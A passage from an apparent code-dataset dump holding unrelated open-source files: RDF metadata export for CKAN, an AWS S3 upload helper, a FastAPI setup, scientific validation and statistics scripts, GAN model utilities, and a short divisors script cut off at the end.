RDFProfile\nfrom ckanext.kata.helpers import convert_language_code, get_download_url, \\\n get_if_url, get_rightscategory, is_url, json_to_list, split_disciplines, \\\n resolve_org_name\nfrom ckanext.kata.utils import get_primary_pid, get_pids_by_type\nfrom ckanext.kata.utils import remove_trailing_spaces, remove_all_spaces\n\nfrom rdflib import BNode, Literal, URIRef\nfrom rdflib.namespace import Namespace, RDF\n\nlog = logging.getLogger(__name__)\n\nDCT = Namespace(\"http://purl.org/dc/terms/\")\nDCAT = Namespace(\"http://www.w3.org/ns/dcat#\")\nADMS = Namespace(\"http://www.w3.org/ns/adms#\")\nORG = Namespace(\"http://www.w3.org/ns/org#\")\nFRAPO = Namespace(\"http://purl.org/cerif/frapo/\")\nRDFS = Namespace(\"http://www.w3.org/2000/01/rdf-schema#\")\nFOAF = Namespace(\"http://xmlns.com/foaf/0.1/\")\nSPDX = Namespace('http://spdx.org/rdf/terms#')\nSCHEMA = Namespace('http://schema.org/')\n\nnamespaces = {\n 'dct': DCT,\n 'dcat': DCAT,\n 'adms': ADMS,\n 'org': ORG,\n 'frapo': FRAPO,\n 'rdfs': RDFS,\n 'foaf': FOAF,\n 'spdx': SPDX,\n 'schema': SCHEMA\n}\n\n\nclass KataDcatProfile(RDFProfile):\n '''\n A custom profile to add KATA fields to the ckanext-dcat RDF serializer.\n Modified from EuropeanDCATAPProfile\n '''\n\n def _add_translated_triple_from_dict(self, _dict, subject, predicate, key,\n fallback=None):\n \"\"\"\n Creates an RDF triple from a Kata language string\n {\"fin\": \"Otsikko\", \"eng\": \"Title\"} ->\n Otsikko\n Title\n \"\"\"\n\n value = self._get_dict_value(_dict, key)\n if not value and fallback:\n value = self._get_dict_value(_dict, fallback)\n for item in json_to_list(value):\n lang = convert_language_code(\n item.get('lang'), 'alpha2', throw_exceptions=False)\n params = (subject, predicate, Literal(\n item.get('value'), lang=lang))\n self.g.add(params)\n\n def graph_from_dataset(self, dataset_dict, dataset_ref):\n primary_pid = get_primary_pid(dataset_dict)\n if not primary_pid:\n return\n\n g = self.g\n\n for prefix, namespace in namespaces.iteritems():\n g.bind(prefix, namespace)\n\n g.add((dataset_ref, RDF.type, DCAT.Dataset))\n\n # Etsin: homepage\n uri = url_for(controller='package', action='read',\n id=dataset_dict.get('name'), qualified=True)\n g.add((dataset_ref, FOAF.homepage, URIRef(remove_trailing_spaces(uri))))\n\n # Etsin: primary identifier\n g.add((dataset_ref, ADMS.identifier, URIRef(remove_trailing_spaces(primary_pid))))\n\n # Etsin: Relation identifiers\n relation_pids = get_pids_by_type('relation', dataset_dict)\n for rpid in relation_pids:\n if rpid.get('relation') == 'isNewVersionOf' or rpid.get('relation') == 'isPreviousVersionOf':\n g.add((dataset_ref, DCT.isVersionOf, URIRef(remove_trailing_spaces(rpid.get('id')))))\n elif rpid.get('relation') == 'hasPart':\n g.add((dataset_ref, DCT.hasPart, URIRef(remove_trailing_spaces(rpid.get('id')))))\n elif rpid.get('relation') == 'isPartOf':\n g.add((dataset_ref, DCT.isPartOf, URIRef(remove_trailing_spaces(rpid.get('id')))))\n else:\n g.add((dataset_ref, DCT.identifier, URIRef(remove_trailing_spaces(rpid.get('id')))))\n\n # Etsin: Title and Description, including translations\n items = [\n (DCT.title, 'langtitle', 'title'),\n (DCT.description, 'notes'),\n ]\n\n for item in items:\n self._add_translated_triple_from_dict(\n dataset_dict, dataset_ref, *item)\n\n # Etsin: Agents\n for agent in dataset_dict.get('agent', []):\n agent_role = agent.get('role')\n agent_id = agent.get('id')\n\n # Rights Holders\n if agent_role in ['owner', 'distributor']:\n name = agent.get('name', None)\n\n if agent_role == 'owner':\n if not get_if_url(agent.get('name')):\n name = agent.get('name', agent.get('organisation', ''))\n nodetype = DCT.rightsHolder\n\n if agent_role == 'distributor':\n nodetype = DCT.publisher\n\n agent_node_ref = BNode()\n g.add((agent_node_ref, RDF.type, FOAF.Agent))\n g.add((dataset_ref, nodetype, agent_node_ref))\n g.add((agent_node_ref, FOAF.name, Literal(name)))\n if agent_id:\n g.add((agent_node_ref, DCT.identifier, Literal(agent_id)))\n\n # Authors\n if agent_role in ['author', 'contributor']:\n if agent_role == 'author':\n nodetype = DCT.creator\n\n if agent_role == 'contributor':\n nodetype = DCT.contributor\n\n organization_ref = BNode()\n agent_ref = BNode()\n memberof_ref = BNode()\n creator_ref = BNode()\n\n g.add((organization_ref, FOAF.name, Literal(\n agent.get('organisation', None))))\n g.add((memberof_ref, FOAF.organization, organization_ref))\n g.add((agent_ref, ORG.memberOf, memberof_ref))\n g.add((agent_ref, FOAF.name, Literal(agent.get('name', None))))\n g.add((creator_ref, FOAF.Agent, agent_ref))\n g.add((dataset_ref, nodetype, creator_ref))\n\n if agent_id:\n g.add((agent_ref, DCT.identifier, Literal(agent_id)))\n\n\n # Funders\n if agent.get('role') == 'funder':\n organization_ref = BNode()\n memberof_ref = BNode()\n project_ref = BNode()\n isoutputof_ref = BNode()\n\n agent_url = agent.get('URL')\n if agent_url:\n g.add((project_ref, FOAF.homepage, Literal(agent_url)))\n\n funding_id = agent.get('fundingid')\n if funding_id:\n g.add((project_ref, RDFS.comment, Literal(funding_id)))\n\n g.add((organization_ref, FOAF.name, Literal(\n agent.get('organisation', None))))\n g.add((memberof_ref, FOAF.organization, organization_ref))\n g.add((project_ref, ORG.memberOf, memberof_ref))\n\n agent_name = agent.get('name', None)\n g.add((project_ref, FOAF.name, Literal(agent_name)))\n\n if agent_id:\n g.add((project_ref, DCT.identifier, Literal(agent_id)))\n\n g.add((isoutputof_ref, FOAF.Project, project_ref))\n g.add((dataset_ref, FRAPO.isOutputOf, isoutputof_ref))\n\n # Etsin: Publishers\n for contact in dataset_dict.get('contact'):\n agent_node_ref = BNode()\n agent_id = contact.get('id')\n\n g.add((agent_node_ref, RDF.type, FOAF.Agent))\n g.add((dataset_ref, DCT.publisher, agent_node_ref))\n\n contact_name = contact.get('name', None)\n g.add((agent_node_ref, FOAF.name, Literal(contact_name)))\n if agent_id:\n g.add((agent_node_ref, DCT.identifier, Literal(agent_id)))\n\n contact_email = contact.get('email')\n if contact_email and contact_email != 'hidden':\n g.add((agent_node_ref, FOAF.mbox,\n URIRef(\"mailto:\" + remove_trailing_spaces(contact_email))))\n\n contact_url = contact.get('URL')\n if contact_url:\n g.add((agent_node_ref, FOAF.homepage, URIRef(remove_trailing_spaces(contact_url))))\n\n contact_phone = remove_all_spaces(contact.get('phone'))\n if contact_phone:\n g.add((agent_node_ref, FOAF.phone,\n URIRef(\"tel:\" + remove_trailing_spaces(contact_phone))))\n\n # Etsin: Organization\n organization_name = resolve_org_name(dataset_dict.get('owner_org'))\n publisher_ref = BNode()\n g.add((dataset_ref, DCT.publisher, publisher_ref))\n g.add((publisher_ref, FOAF.organization, Literal(organization_name)))\n\n # Etsin: Tags - can be URLs or user inputted keywords\n # TODO: resolve URLs from Finto. Currently get_label_for_uri() breaks\n # RDFlib.\n for tag in dataset_dict.get('tags', []):\n display_name = tag.get('display_name')\n g.add((dataset_ref, DCAT.keyword, Literal(display_name)))\n tag_name = tag.get('name')\n if is_url(tag_name):\n g.add((dataset_ref, DCAT.theme, URIRef(remove_trailing_spaces(tag_name))))\n\n # Etsin: Dates\n # Peter: Issued-field is new. This used to be inside CatalogRecord.\n items = [\n ('issued', DCT.issued, ['metadata_created'], Literal),\n ('modified', DCT.modified, ['metadata_modified'], Literal),\n ]\n self._add_date_triples_from_dict(dataset_dict, dataset_ref, items)\n\n # Etsin: Events\n for event in dataset_dict.get('event', []):\n event_ref = BNode()\n g.add((dataset_ref, DCT.event, event_ref))\n g.add((event_ref, DCT.type, Literal(event.get('type'))))\n g.add((event_ref, DCT.creator, Literal(event.get('who'))))\n g.add((event_ref, DCT.date, Literal(str(event.get('when')))))\n g.add((event_ref, DCT.description, Literal(event.get('descr'))))\n\n # Etsin: Citation\n citation = dataset_dict.get('citation')\n if citation:\n g.add((dataset_ref, DCT.bibliographicCitation, Literal(citation))) \n\n\n # Etsin: Distribution\n availability_list = ['access_application_rems',\n 'access_application_other',\n 'access_request']\n\n checksum_ref = BNode()\n checksum_parent_ref = BNode()\n distribution_ref = BNode()\n dist_parent_ref = BNode()\n\n if dataset_dict.get('availability') == 'direct_download':\n access_url = get_download_url(dataset_dict)\n g.add((distribution_ref, DCAT.downloadURL, Literal(access_url)))\n\n checksum = dataset_dict.get('checksum')\n algorithm = dataset_dict.get('algorithm')\n if checksum and algorithm:\n g.add((checksum_ref, SPDX.checksumValue, Literal(checksum)))\n g.add((checksum_ref, SPDX.algorithm, Literal(algorithm)))\n g.add((checksum_parent_ref, SPDX.Checksum, checksum_ref))\n g.add((distribution_ref, SPDX.checksum, checksum_parent_ref))\n\n if dataset_dict.get('availability') in availability_list:\n access_url = get_download_url(dataset_dict)\n g.add((distribution_ref, DCAT.accessURL, Literal(access_url)))\n\n mimetype = dataset_dict.get('mimetype')\n if mimetype:\n g.add((distribution_ref, DCAT.mediaType, Literal(mimetype)))\n\n dist_format = dataset_dict.get('format')\n if dist_format:\n g.add((distribution_ref, DCT['format'], Literal(dist_format)))\n\n g.add((dist_parent_ref, DCAT.Distribution, distribution_ref))\n g.add((dataset_ref, DCAT.distribution, dist_parent_ref))\n\n # Etsin: Disciplines\n disciplines = dataset_dict.get('discipline', '')\n for discipline in split_disciplines(disciplines):\n if is_url(discipline):\n disc = URIRef(remove_trailing_spaces(discipline))\n\n else:\n disc = Literal(discipline)\n g.add((dataset_ref, DCT.subject, disc))\n\n # Etsin: Rights Declaration\n # Peter: There's no way to add an xmlns attribute under\n # the parent in rdflib\n category, declarations = get_rightscategory(dataset_dict)\n declaration_strings = ''\n for declaration in declarations:\n declaration_strings += u'{}\\n'\\\n .format(declaration)\n xml_string = u'\\n{}'\\\n .format(category, declaration_strings)\n\n license_url = dataset_dict.get('license_URL')\n\n rights_ref = BNode()\n g.add((dataset_ref, DCT.rights, rights_ref))\n g.add((rights_ref, DCT.RightsStatement, Literal(\n xml_string, datatype=RDF.XMLLiteral)))\n g.add((rights_ref, DCT.RightsStatement, Literal(license_url)))\n\n\n # Etsin: Spatial\n coverage = dataset_dict.get('geographic_coverage')\n if coverage:\n spatial_ref = BNode()\n location_ref = BNode()\n g.add((location_ref, RDFS.label, Literal(coverage)))\n g.add((spatial_ref, DCT.Location, location_ref))\n g.add((dataset_ref, DCT.spatial_ref, spatial_ref))\n\n # Etsin: Temporal\n # Peter: hasBeginning and hasEnd left out\n temporal_coverage_begin = dataset_dict.get('temporal_coverage_begin')\n temporal_coverage_end = dataset_dict.get('temporal_coverage_end')\n if temporal_coverage_begin or temporal_coverage_end:\n temporal_extent = BNode()\n\n g.add((temporal_extent, RDF.type, DCT.PeriodOfTime))\n if temporal_coverage_begin:\n self._add_date_triple(\n temporal_extent, SCHEMA.startDate, temporal_coverage_begin)\n\n if temporal_coverage_end:\n self._add_date_triple(\n temporal_extent, SCHEMA.endDate, temporal_coverage_end)\n\n g.add((dataset_ref, DCT.temporal, temporal_extent))\n\n # Etsin: language field needs to be stripped from spaces\n langs = self._get_dict_value(dataset_dict, 'language', '').split(', ')\n for lang in langs:\n params = (dataset_ref, DCAT.language, Literal(lang))\n self.g.add(params)\n","repo_name":"kata-csc/ckanext-kata","sub_path":"ckanext/kata/kata_dcat_profile.py","file_name":"kata_dcat_profile.py","file_ext":"py","file_size_in_byte":14156,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"15385157729","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n' StorageHelp for AWS version '\n\nimport boto3\nimport logging\nimport os\nimport configparser\nif __name__ == '__main__':\n from StorageHelpBase import StorageHelpBase\nelse:\n from .StorageHelpBase import StorageHelpBase\n\n\n__author__ = 'Ed Hsu'\n\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s %(levelname)s [%(filename)s-%(funcName)s()]'\n ' %(message)s',\n datefmt='%m-%d %H:%M')\n\n\nclass StorageHelpAws(StorageHelpBase):\n def __init__(self, credential):\n super().__init__(credential)\n\n def get_bucket_acl(self, bucket):\n client = self.__get_client()\n acl = client.get_bucket_acl(Bucket=bucket)\n logging.info('''bucket acl:{}'''.format(acl))\n\n def upload(self, bucket, src_file, target_file):\n logging.info('''\n bucket:{}\n src_file:{}\n target_file:{}'''.format(bucket, src_file, target_file))\n res = self.__get_resource()\n res.Bucket(bucket).upload_file(src_file, target_file, ExtraArgs={'ACL': 'public-read'})\n\n def __get_client(self):\n client = boto3.client(\n 's3',\n aws_access_key_id=self.credential['aws_access_key_id'],\n aws_secret_access_key=self.credential['aws_secret_access_key']\n )\n return client\n\n def __get_resource(self):\n res = boto3.resource(\n 's3',\n aws_access_key_id=self.credential['aws_access_key_id'],\n aws_secret_access_key=self.credential['aws_secret_access_key']\n )\n return res\n\nif __name__ == '__main__':\n credentialFile = os.path.join(os.path.dirname(__file__), 'credential.cfg')\n config = configparser.ConfigParser()\n config.read(credentialFile)\n # print(config.sections())\n dict_credential = {\n 'aws_access_key_id': config['AWS_INFO']['AWS_ACCESS_KEY_ID'],\n 'aws_secret_access_key': config['AWS_INFO']['AWS_SECRET_ACCESS_KEY']}\n myStorageHelp = StorageHelpAws(dict_credential)\n bucket_name = config['AWS_INFO']['AWS_BUCKET_HOME_PORTAL']\n # myStorageHelp.get_bucket_acl(bucket_name)\n\n resDir = os.path.join(os.path.dirname(__file__), 'res')\n srcFile = os.path.join(resDir, '1.jpg')\n targetFile = 'test/{}'.format(os.path.basename(srcFile))\n myStorageHelp.upload(bucket_name, srcFile, targetFile)\n","repo_name":"sauleddy/HomePortal","sub_path":"resource_help/ResHelp/StorageHelp/StorageHelpAws.py","file_name":"StorageHelpAws.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2596806332","text":"from fastapi import FastAPI, APIRouter\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom app.api.api_v1.api import api_router\nfrom app.core.config import settings\n\n\ndef include_router(app):\n app.include_router(api_router) # список маршрутов для API\n\n\ndef start_application():\n app = FastAPI(title=settings.PROJECT_TITLE, version=settings.PROJECT_VERSION)\n # app = FastAPI()\n include_router(app)\n if settings.BACKEND_CORS_ORIGINS:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n return app\n\n\napp = start_application()\n","repo_name":"wai81/grkapp_pay_terminal","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7508100633","text":"# @package cwfs\n# @file validation.py\n# @brief validation script for cwfs\n##\n# @authors: Bo Xin & Chuck Claver\n# @ Large Synoptic Survey Telescope\n\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom cwfsInstru import cwfsInstru\nfrom cwfsAlgo import cwfsAlgo\nfrom cwfsImage import cwfsImage\n\nimgDir = ['../testImages/F1.23_1mm_v61',\n '../testImages/LSST_C_SN26', '../testImages/LSST_C_SN26',\n '../testImages/LSST_NE_SN25', '../testImages/LSST_NE_SN25']\nintra = ['z7_0.25_intra.txt',\n 'z7_0.25_intra.txt', 'z7_0.25_intra.txt',\n 'z11_0.25_intra.txt', 'z11_0.25_intra.txt']\nextra = ['z7_0.25_extra.txt',\n 'z7_0.25_extra.txt', 'z7_0.25_extra.txt',\n 'z11_0.25_extra.txt', 'z11_0.25_extra.txt']\nfldxy = np.array([[0, 0], [0, 0], [0, 0], [1.185, 1.185], [1.185, 1.185]])\nmyalgo = ['fft', 'fft', 'exp', 'fft', 'exp']\nmymodel = ['paraxial', 'onAxis', 'onAxis', 'offAxis', 'offAxis']\nmyinst = 'lsst'\n\nvalidationDir = 'validation'\nmatlabZFile = ['F1.23_1mm_v61_z7_0.25_fft.txt',\n 'LSST_C_SN26_z7_0.25_fft.txt',\n 'LSST_C_SN26_z7_0.25_exp.txt',\n 'LSST_NE_SN25_z11_0.25_fft.txt',\n 'LSST_NE_SN25_z11_0.25_exp.txt']\n\nznmax = 22\nnTest = len(intra)\nzer = np.zeros((znmax - 3, nTest))\nmatZ = np.zeros((znmax - 3, nTest))\nx = range(4, znmax + 1)\n\nfig = plt.figure(figsize=(10, 10))\n\nfor j in range(0, nTest):\n intraFile = os.path.join(imgDir[j], intra[j])\n extraFile = os.path.join(imgDir[j], extra[j])\n I1 = cwfsImage(intraFile, fldxy[j, :], 'intra')\n I2 = cwfsImage(extraFile, fldxy[j, :], 'extra')\n\n inst = cwfsInstru(myinst, I1.sizeinPix)\n algo = cwfsAlgo(myalgo[j], inst, 1)\n algo.runIt(inst, I1, I2, mymodel[j])\n zer[:, j] = algo.zer4UpNm\n\n matZ[:, j] = np.loadtxt(os.path.join(validationDir, matlabZFile[j]))\n\n ax = plt.subplot(nTest, 1, j + 1)\n plt.plot(x, matZ[:, j], label='Matlab',\n marker='o', color='r', markersize=10)\n plt.plot(x, zer[:, j], label='Python',\n marker='.', color='b', markersize=10)\n plt.legend(loc=\"upper right\", shadow=True,\n title=matlabZFile[j], fancybox=True)\n ax.get_legend().get_title().set_color(\"red\")\n\nplt.show()\n","repo_name":"WIYN-ODI/cwfs","sub_path":"validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"42418498406","text":"import numpy as np\r\nfrom mpmath import mp\r\n\r\nmp.dps = 1000\r\n\r\n\r\ndef f(z_interval, etajTy, mu, tn_sigma):\r\n numerator = 0\r\n denominator = 0\r\n\r\n for each_interval in z_interval:\r\n al = each_interval[0]\r\n ar = each_interval[1]\r\n\r\n cdf_ar = mp.ncdf((ar - mu) / tn_sigma)\r\n cdf_al = mp.ncdf((al - mu) / tn_sigma)\r\n\r\n denominator = denominator + cdf_ar - cdf_al\r\n\r\n if etajTy >= ar:\r\n numerator = numerator + cdf_ar - cdf_al\r\n elif (etajTy >= al) and (etajTy < ar):\r\n numerator = numerator + mp.ncdf((etajTy - mu) / tn_sigma) - cdf_al\r\n\r\n if denominator != 0:\r\n return float(numerator / denominator)\r\n else:\r\n return np.Inf\r\n\r\n\r\ndef find_root(z_interval, etajTy, tn_sigma, y, lb, ub):\r\n \"\"\"\r\n searches for solution to f(x) = y in (lb, ub), where\r\n f is a monotone decreasing function\r\n \"\"\"\r\n\r\n a, b = lb, ub\r\n fa, fb = f(z_interval, etajTy, a, tn_sigma), f(z_interval, etajTy, b, tn_sigma)\r\n\r\n if (fa > y) and (fb > y):\r\n while fb > y:\r\n b = b + ((b - a)/2)\r\n fb = f(z_interval, etajTy, b, tn_sigma)\r\n if fb == np.Inf:\r\n fb = 0\r\n\r\n elif (fa < y) and (fb < y):\r\n while fa < y:\r\n a = a - ((b - a)/2)\r\n fa = f(z_interval, etajTy, a, tn_sigma)\r\n if fa == np.Inf:\r\n fa = 1\r\n\r\n c = None\r\n\r\n while np.abs(b - a) > 1e-3:\r\n c = (a + b) / 2\r\n fc = f(z_interval, etajTy, c, tn_sigma)\r\n\r\n if np.around(fc, 4) == y:\r\n break\r\n\r\n if fc > y:\r\n a = c\r\n else:\r\n b = c\r\n\r\n return c\r\n\r\n\r\ndef equal_tailed_interval(z_interval, etajTy, alpha, tn_sigma):\r\n lb = -20\r\n ub = 20\r\n\r\n L = find_root(z_interval, etajTy, tn_sigma, 1.0 - 0.5 * alpha, lb, ub)\r\n U = find_root(z_interval, etajTy, tn_sigma, 0.5 * alpha, lb, ub)\r\n\r\n return np.array([L, U])\r\n\r\n\r\ndef compute_ci_with_constructed_interval(z_interval, etaj, etajTy, cov, alpha):\r\n tn_sigma = np.sqrt(np.dot(np.dot(etaj.T, cov), etaj))[0][0]\r\n\r\n ci = equal_tailed_interval(z_interval, etajTy, alpha, tn_sigma)\r\n\r\n return ci","repo_name":"vonguyenleduy/selective_inference_wasserstein_distance","sub_path":"ci.py","file_name":"ci.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27239565463","text":"from collections import defaultdict\nimport pandas as pd\nimport numpy as np\n\nCOLORS = ['steelblue', 'peru', 'red', 'limegreen', 'yellow', 'blue', 'darkgreen', 'orange', 'magenta']\n\n# Default use for gurobi\ndef viz_schedule(avail, b, n):\n n_filter = n.astype(bool)\n b_filter = b.astype(bool)\n a_filter = ~avail.astype(bool)\n\n def color_col(df):\n c_dict = defaultdict(lambda:'brown', zip(avail.columns, COLORS))\n df2 = df.copy(deep=True)\n df2[a_filter] = 'background-color: gray'\n for i, (colname, series) in enumerate(df2.items()):\n color = f\"background-color: {c_dict[colname]}\"\n series[(n_filter+b_filter)[:,i]] = color\n return df2\n\n schedule = pd.DataFrame(np.zeros(avail.shape), columns=avail.columns)\n schedule.iloc[:,:] = \"\"\n schedule[n_filter] = \"N\"\n schedule[b_filter] = \"B\"\n schedule[a_filter] = \"-\"\n return schedule.style.apply(color_col, axis=None)","repo_name":"janwodnicki/vet-scheduler","sub_path":"vizlib.py","file_name":"vizlib.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43458239834","text":"import torch\nfrom torch.autograd import Variable\n\nimport matplotlib.pyplot as plt\nimport itertools\nimport os\n\nfrom model.cgan import Generator\nfrom config import get_config\n\n# Device configuration\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nclass Tester(object):\n # initializer\n def __init__(self, config, weight_path, out_path):\n self.config = config\n\n self.nz = config.nz\n self.ngf = config.ngf\n self.ndf = config.ndf\n\n self.image_size = config.image_size\n self.ncls = config.n_classes\n\n self.g_path = weight_path + \"generator.pth\"\n\n self.out_path = out_path\n\n self.load_net()\n\n # load trained network\n def load_net(self):\n self.g = Generator(self.nz, self.ngf, self.ncls, self.image_size)\n self.g.load_state_dict(torch.load(self.g_path, map_location=lambda storage, loc: storage))\n self.g = self.g.to(device)\n self.g.eval() # fix parameters\n\n def denorm(self, x):\n out = (x + 1) / 2\n return out.clamp(0, 1)\n\n # generate test result images\n def test(self, nsamples):\n # fixed noise & label\n temp_z = torch.randn(nsamples, self.nz)\n fixed_z = temp_z\n fixed_y = torch.zeros(nsamples, 1)\n\n for i in range(self.ncls-1):\n fixed_z = torch.cat([fixed_z, temp_z], 0)\n temp_y = torch.ones(nsamples, 1) + i\n fixed_y = torch.cat([fixed_y, temp_y], 0)\n\n fixed_y_label = torch.zeros(nsamples*self.ncls, self.ncls)\n fixed_y_label.scatter_(1, fixed_y.type(torch.LongTensor), 1)\n\n # set fixed variable\n fixed_z = fixed_z.to(device)\n fixed_y_label = fixed_y_label.to(device)\n\n # generate result images\n result_imgs = self.g(fixed_z, fixed_y_label)\n result_imgs = result_imgs.view(-1, 1, self.image_size, self.image_size)\n result_imgs = self.denorm(result_imgs)\n\n # process image and save\n fig, ax = plt.subplots(self.ncls, nsamples, figsize=(5, 5))\n for i, j in itertools.product(range(self.ncls), range(nsamples)):\n ax[i, j].get_xaxis().set_visible(False)\n ax[i, j].get_yaxis().set_visible(False)\n\n for k in range(nsamples * self.ncls):\n i = k // nsamples\n j = k % nsamples\n ax[i, j].cla()\n ax[i, j].imshow(result_imgs[k, 0].cpu().data.numpy(), cmap='gray')\n\n label = 'Result image'\n fig.text(0.5, 0.04, label, ha='center')\n plt.savefig(self.out_path)\n\nif __name__ == \"__main__\":\n config = get_config()\n\n weight_path = \"samples\\weights\\\\\"\n\n os.makedirs('test', exist_ok=True)\n\n tester = Tester(config, weight_path, 'test\\out.png')\n tester.test(nsamples=15)","repo_name":"songyoungin/PG3_study","sub_path":"GAN/cGAN/MNIST/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10164602097","text":"import logging\n\nimport pytest\nfrom asapdiscovery.data.logging import FileLogger\nfrom asapdiscovery.data.testing.test_resources import fetch_test_file\nfrom asapdiscovery.dataviz.gif_viz import GIFVisualizer\n\n\n@pytest.fixture(scope=\"session\")\ndef top():\n top = fetch_test_file(\"example_traj_top.pdb\")\n return top\n\n\n@pytest.fixture(scope=\"session\")\ndef traj():\n traj = fetch_test_file(\"example_traj.xtc\")\n return traj\n\n\n@pytest.mark.parametrize(\n \"logger\",\n [\n None,\n FileLogger(\n \"gif_to_viz\", path=\"./\", stdout=True, level=logging.DEBUG\n ).getLogger(),\n ],\n)\ndef test_gif_viz(traj, top, logger, tmp_path):\n gif_visualiser = GIFVisualizer(\n [traj],\n [top],\n [tmp_path / \"gif_viz.gif\"],\n \"SARS-CoV-2-Mpro\", # just do a fast test with one target\n frames_per_ns=200,\n smooth=5,\n start=0,\n logger=logger,\n pse=False,\n pse_share=False,\n )\n gif_visualiser.write_traj_visualizations()\n","repo_name":"choderalab/asapdiscovery","sub_path":"asapdiscovery-dataviz/asapdiscovery/dataviz/tests/test_gif_viz.py","file_name":"test_gif_viz.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"14767135676","text":"import os\r\nimport imageio\r\nimport numpy as np\r\nfrom skimage.transform import resize\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.initializers import RandomNormal\r\nfrom tensorflow.keras.layers import Conv2D, Activation, Concatenate\r\n# from keras_contrib.layers.normalization.instancenormalization import InstanceNormalization\r\nimport matplotlib.pyplot as plt\r\n\r\nclass InstanceNormalization(tf.keras.layers.Layer):\r\n # Initialization of Objects\r\n def __init__(self, epsilon=1e-5):\r\n # calling parent's init\r\n super(InstanceNormalization, self).__init__()\r\n self.epsilon = epsilon\r\n\r\n def build(self, input_shape):\r\n self.scale = self.add_weight(\r\n name='scale',\r\n shape=input_shape[-1:],\r\n initializer=tf.random_normal_initializer(1., 0.02),\r\n trainable=True)\r\n self.offset = self.add_weight(\r\n name='offset',\r\n shape=input_shape[-1:],\r\n initializer='zeros',\r\n trainable=True)\r\n\r\n def call(self, x):\r\n # Compute Mean and Variance, Axes=[1,2] ensures Instance Normalization\r\n mean, variance = tf.nn.moments(x, axes=[1, 2], keepdims=True)\r\n inv = tf.math.rsqrt(variance + self.epsilon)\r\n normalized = (x - mean) * inv\r\n return self.scale * normalized + self.offset\r\n\r\nclass DataUtils:\r\n def __init__(self, sourcePath, resize):\r\n '''\r\n\r\n :param sourcePath: File path to data source\r\n '''\r\n self.data = None\r\n self.sourcePath = sourcePath\r\n self.resize = resize\r\n self.imageSize = None\r\n\r\n self.prepareData()\r\n\r\n def prepareData(self):\r\n self.readFiles()\r\n self.dataPreprocess()\r\n\r\n def readFiles(self):\r\n '''\r\n function to read the data files from the path specified\r\n :return: the list of data elements in the form of numpy array\r\n '''\r\n\r\n # check if the path is valid or not\r\n if os.path.isdir(self.sourcePath):\r\n self.data = [imageio.imread(os.path.join(self.sourcePath, f)) for f in os.listdir(self.sourcePath)\r\n if f.endswith(('.jpeg', '.jpg', '.png'))]\r\n\r\n self.imageSize = self.data[-1].shape\r\n\r\n if len(self.imageSize) != len(self.resize):\r\n raise Exception(\"Size mismatch!!\")\r\n\r\n else:\r\n raise Exception(\"Path Invalid\")\r\n\r\n def dataPreprocess(self):\r\n # normalize the data between -1 to +1\r\n normalized_data = (np.asarray(self.data, dtype=np.float32) / 127.5) - 1\r\n\r\n if len(self.imageSize) == 2:\r\n self.resize = (self.resize[0], self.resize[1], 1)\r\n self.imageSize = (self.imageSize[0], self.imageSize[1], 1)\r\n normalized_data.reshape((normalized_data.shape[0],self.imageSize[0],self.imageSize[1], self.imageSize[2]))\r\n\r\n\r\n final_shape = (normalized_data.shape[0], self.resize[0], self.resize[1], self.resize[2])\r\n\r\n self.data = np.zeros(final_shape, dtype=np.float32)\r\n for index, img in enumerate(normalized_data):\r\n self.data[index, :, :,:] = resize(img, self.resize)\r\n\r\n\r\n def get_data(self, batch_size):\r\n # batch and shuffle the data\r\n return tf.data.Dataset.from_tensor_slices(self.data).shuffle(self.data.shape[0], seed=42).batch(batch_size)\r\n\r\n\r\n\r\ndef resnet_block(n_filters, input_layer):\r\n # weight initialization\r\n init = RandomNormal(stddev=0.02)\r\n # first layer convolutional layer\r\n g = Conv2D(n_filters, (3, 3), padding='same', kernel_initializer=init)(input_layer)\r\n g = InstanceNormalization()(g)\r\n g = Activation('relu')(g)\r\n # second convolutional layer\r\n g = Conv2D(n_filters, (3, 3), padding='same', kernel_initializer=init)(g)\r\n g = InstanceNormalization()(g)\r\n # concatenate merge channel-wise with input layer\r\n g = Concatenate()([g, input_layer])\r\n return g\r\n","repo_name":"BharathSD/CycleGAN-For-MRI","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"36430682145","text":"def divisors(num):\n\n try:\n\n if num < 1:\n raise ValueError('¡ERROR! El número debe ser positivo')\n \n if type(num) is not int:\n raise TypeError('¡ERROR! El número debe ser un entero')\n\n except ValueError as ve:\n\n print(ve)\n \n except TypeError as te:\n\n print(te)\n\n else:\n divisors = [i for i in range(1, num + 1) if num % i == 0]\n return divisors\n\n\ndef run():\n try:\n\n num = int(input('Ingresa un número: '))\n num_divisors = divisors(num)\n if num_divisors != None:\n print(num_divisors)\n\n except ValueError as ve:\n\n 